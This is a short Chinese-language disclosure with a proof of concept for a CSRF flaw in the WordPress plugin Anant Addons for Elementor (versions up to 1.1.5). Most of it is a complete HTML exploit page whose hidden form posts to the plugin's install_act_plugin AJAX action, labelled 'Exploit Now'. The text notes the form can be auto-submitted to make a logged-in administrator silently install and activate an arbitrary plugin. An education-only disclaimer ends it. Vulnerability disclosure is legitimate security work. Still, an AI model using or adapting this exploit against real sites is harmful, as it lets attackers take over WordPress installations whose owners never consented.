**跨站请求伪造(CSRF)**漏洞存在于 anantaddons 的 Anant Addons for Elementor 中
此问题影响版本:从未知版本到 1.1.5
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H此漏洞允许未认证的攻击者在管理员不知情的情况下,代表已登录的管理员执行任意插件安装。
通过构造恶意页面或表单,攻击者可以静默地强制管理员从 WordPress 仓库安装并激活任意插件。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Anant Addons for Elementor <= 1.1.5 CSRF Exploit</title>
<style>
body {
background-color: #111;
color: #0f0;
font-family: monospace;
padding: 40px;
}
h1 {
color: #ff0055;
font-size: 24px;
border-bottom: 1px solid #555;
padding-bottom: 10px;
}
.box {
background-color: #222;
border: 1px solid #444;
padding: 20px;
margin-top: 20px;
}
input[type="submit"] {
background-color: #ff0055;
color: #fff;
border: none;
padding: 10px 20px;
font-weight: bold;
cursor: pointer;
}
input[type="submit"]:hover {
background-color: #cc0044;
}
</style>
</head>
<body>
<h1>
Anant Addons for Elementor <= 1.1.5<br>
CSRF to Arbitrary Plugin Installation Vulnerability
</h1>
<div class="box">
<p># By: <strong>Nxploited | Khaled Alenazi</strong></p>
<p># Type: <strong>CSRF (No Nonce Validation)</strong></p>
<p># Impact: <strong>Unauthenticated attacker can force admin to install and activate arbitrary WordPress plugins</strong></p>
</div>
<form action="http://192.168.100.74:888/wordpress/wp-admin/admin-ajax.php?action=install_act_plugin" method="POST" class="box">
<input type="hidden" name="plugs" value="hello-dolly">
<p>🎯 Click the button below to trigger plugin installation (admin session must be active):</p>
<input type="submit" value="Exploit Now">
</form>
</body>
</html>
🎯 当已登录的管理员点击此表单(或该表单在恶意页面中自动提交)时,插件将被静默安装并激活。
本仓库及内容仅供教育和安全研究目的使用。
作者对因不当使用此信息而导致的任何滥用或损害概不负责。
请始终在您拥有或已获得明确测试许可的系统上执行测试。
作者:Nxploited | Khaled ALenazi